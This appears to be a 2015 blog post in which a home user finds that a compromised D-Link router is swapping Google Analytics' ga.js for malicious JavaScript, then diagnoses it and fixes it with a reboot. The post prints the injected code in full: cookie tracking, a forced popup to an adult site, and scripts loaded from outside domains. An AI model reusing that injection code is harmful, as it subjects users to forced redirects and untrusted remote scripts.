Skip to content

Malware in D-Link router was resulting in wrong Google-Analytics Java script

March 9, 2015

Today I started to face some weird issues while browsing some sites. They started to pop up some spammy pages in new tabs. First I thought the site I was going to had malware.

But later on I saw that, it was done by MITM’ing[1] the Google Analytics(GA) page. What I saw was that, on my computer, and some other computers at home, when I tried to fetch the below GA java script it returned the following malware infecting JS code instead. Shown below

Malware infecting Google Analytics JS

Content of http://www.google-analytics.com/ga.js:

Warning! Some NSFW sites in this injected JS. Careful with clicking!!

function setCookie(name, value, expires, path, domain, secure) {
document.cookie = name + “=” + escape(value) +
((expires) ? “; expires=” + expires : “”) +
((path) ? “; path=” + path : “”) +
((domain) ? “; domain=” + domain : “”) +
((secure) ? “; secure” : “”);
};
function getCookie(name) {
var cookie = ” ” + document.cookie;
var search = ” ” + name + “=”;
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0) {
offset = cookie.indexOf(search);
if (offset != -1) {
offset += search.length;
end = cookie.indexOf(“;”, offset)
if (end == -1) {
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
};

var tmp = document.createElement(‘div’);
tmp.setAttribute(“align”,”center”);
tmp.innerHTML = “http://adultube.info“;;
var iframe = tmp.firstChild;
var body = document.getElementsByTagName(‘body’)[0];
body.insertBefore(tmp, body.firstChild);

var params = “menubar=yes,location=yes,resizable=yes,scrollbars=yes,status=yes”
function PopShow3() {
CookieTest=navigator.cookieEnabled;
if(CookieTest)
{
ClickUndercookie = GetCookie(‘clickunder’);
if (ClickUndercookie == null)
{
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (24 * 60 * 60 * 1000));
SetCookie(‘clickunder’,’1′,ExpDate, “/”);
window.open(“http://contentmovey.org/?hash=hg9umc”, “Sex”, params);
window.focus();
}
}
}
function GetCookie (name) {
var arg = name + “=”;
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + “=” + escape (value) +
((expires == null) ? “” : (“; expires=” + expires.toGMTString())) +
((path == null) ? “” : (“; path=” + path)) +
((domain == null) ? “” : (“; domain=” + domain)) +
((secure == true) ? “; secure” : “”);
}
document.onmouseup=PopShow3;

(function(w) {
var script = document.createElement(‘script’);
var i = setInterval(function() {
if (typeof w.document.body !== ‘undefined’) {
script.src = ‘http://sgwomxnntit.people-are-thought.info’ + ‘/?973481=3ZTd24_LxcbKwsDN2pSYn5-fnJo’;
w.document.body.appendChild(script);
clearInterval(i);
}
}, 200);
})(window);

(function(w) {
var script = document.createElement(‘script’);
var i = setInterval(function() {
if (typeof w.document.body !== ‘undefined’) {
script.src = ‘http://clbspvpyukt.people-are-thought.info’ + ‘/?446818=Fl8WEEQADg0BCQsGEV9TVFRUVVs’;
w.document.body.appendChild(script);
clearInterval(i);
}
}, 200);
})(window);

If you notice carefully, it has domains like adultube_dot_info

Investigate and Fix:
When I used my phone’s 3G Internet connection on the computer. This problem was not there. So that made me think that MITM is happening at my ISP (BSNL) or my router.

I have two levels of routers. When I tried to open the admin page of my first level router, it responded as ‘Busy’. Just this text, nothing else. That caused suspicion. I rebooted it and the problem was gone.

Now I am worried, if it caused some permanent changes to my router. Obviously restoring the factory settings will fix that as well.

Cause & Further thoughts
I think the problem crept because of us visiting some suspicious pages, to download some music. And they installed some malware in the router. Apparently it is possible. as per this link.

This episode also made me think that all sites should move to HTTPS to prevent MITM.

Also that my phone’s 3-G is more secure, that its “router” can’t be corrupted by malware in this way. Also the traffic over the air, is encrypted. And the private keys of all the handsets, which are used to encrypt this are only with Cell infra companies (or with NSA!), So there!! But at-least it is safe from normal malware sites.

[1] MITM – Man-in-the-middle attack

Advertisements

From → Uncategorized

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: